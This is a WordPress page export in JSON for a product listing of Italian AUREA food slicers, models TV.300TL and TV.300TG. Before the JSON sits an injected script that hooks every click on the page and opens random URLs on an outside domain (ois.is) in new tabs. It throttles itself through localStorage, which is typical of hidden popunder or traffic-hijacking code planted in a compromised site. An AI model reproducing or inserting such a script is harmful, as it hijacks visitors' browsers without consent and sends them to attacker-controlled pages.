<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":364,"date":"2017-08-01T18:16:16","date_gmt":"2017-08-01T13:46:16","guid":{"rendered":"http:\/\/saeed-moshaver.com\/en\/?page_id=364"},"modified":"2017-08-02T09:46:38","modified_gmt":"2017-08-02T05:16:38","slug":"aurea","status":"publish","type":"page","link":"http:\/\/saeed-moshaver.com\/en\/aurea\/","title":{"rendered":"Aurea"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<span id=\"result_box\" class=\"\" lang=\"en\"><strong>Aurea:<\/strong> AUREA Slider Made in Italy<br \/>\n<\/span><\/p>\n<p><span id=\"result_box\" class=\"\" lang=\"en\"><strong>AUREA slider, TV.300TL model<\/strong><br \/>\n<\/span><\/p>\n<ol>\n<li><span id=\"result_box\" class=\"\" lang=\"en\">Directions for slices of variety and fruits<\/span><\/li>\n<li><span id=\"result_box\" class=\"\" lang=\"en\">Suitable for all types of slices and slabs with a capacity of 720 kph<br \/>\n<\/span><\/li>\n<\/ol>\n<p><span id=\"result_box\" class=\"\" lang=\"en\"><strong>Slider AUREA Italy, model TV.300TG<\/strong><\/span><span id=\"result_box\" class=\"\" lang=\"en\"><\/span><\/p>\n<ol>\n<li><span id=\"result_box\" class=\"\" lang=\"en\">For Slice Types and Fruits,<\/span><\/li>\n<li><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Suitable for cutting and slice types with a capacity of 450 kg \/ h<\/span><br \/>\n<\/span><\/li>\n<\/ol>\n<p><span id=\"result_box\" class=\"\" lang=\"en\">Click for <a href=\"http:\/\/www.aureaali.com\/\">more info \u2026.<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" class=\"aligncenter size-medium wp-image-267\" src=\"http:\/\/saeed-moshaver.com\/wp-content\/uploads\/2017\/07\/logo-300x83.png\" alt=\"\" width=\"300\" height=\"83\" srcset=\"http:\/\/saeed-moshaver.com\/en\/wp-content\/uploads\/2017\/07\/logo-300x83.png 300w, http:\/\/saeed-moshaver.com\/en\/wp-content\/uploads\/2017\/07\/logo.png 352w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;255&#8243; img_size=&#8221;300*300&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_border&#8221; border_color=&#8221;black&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;top-to-bottom&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;256&#8243; img_size=&#8221;300*300&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_border&#8221; border_color=&#8221;black&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;top-to-bottom&#8221;][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=&#8221;1\/4&#8243;][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]Aurea: AUREA Slider Made in Italy AUREA slider, TV.300TL model Directions for slices of variety and fruits Suitable for all types of slices and slabs with a capacity of 720 kph Slider AUREA Italy, model TV.300TG For Slice Types and Fruits, Suitable for cutting and slice types with a capacity of 450 kg [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/364"}],"collection":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/comments?post=364"}],"version-history":[{"count":2,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/364\/revisions"}],"predecessor-version":[{"id":375,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/364\/revisions\/375"}],"wp:attachment":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/media?parent=364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}